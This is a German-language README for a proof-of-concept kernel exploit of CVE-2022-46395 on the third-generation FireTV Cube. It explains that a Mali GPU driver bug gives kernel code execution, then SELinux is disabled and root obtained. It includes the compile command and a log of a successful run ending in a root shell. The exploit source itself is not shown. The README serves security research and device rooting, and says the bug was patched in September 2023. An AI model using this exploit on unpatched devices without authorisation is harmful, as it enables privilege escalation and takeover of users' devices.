
CVE-2022-46395 POC für FireTV 3. Generation Cube (gazelle)
Dies ist ein Fork des Pixel 6 POC des Sicherheitsforschers Man Yue Mo für CVE-2022-46395. Lies seinen detaillierten Beitrag zur Schwachstelle hier. Es wurden Änderungen vorgenommen, um den 32-Bit-Benutzerbereich von FireOS zu berücksichtigen. Der POC nutzt einen Fehler im ARM Mali-Kernel-Treiber aus, um beliebige Kernel-Code-Ausführung zu erlangen, die dann verwendet wird, um SELinux zu deaktivieren und Root zu erhalten.
Der Exploit wurde in PS7664/3772 (September 2023) gepatcht. Zum Nachschlagen wurde der folgende Befehl mit clang in ndk-21 kompiliert:
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o gazelle_buf
Für schnellste Ergebnisse führen Sie das Programm nach einem Neustart aus. Im Durchschnitt benötigt der POC 20-60 Sekunden, um Root zu erlangen.
gazelle:/ $ /data/local/tmp/gazelle_buf
fingerprint: Amazon/gazelle/gazelle:9/PS7652.3564N/0028488625152:user/amz-p,release-keys
benchmark_time 102
failed after 100
finished reset: 919423975 fault: 918468559 3795 err 0 read 3
found pgd at page 8
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
success after 128
gazelle:/ #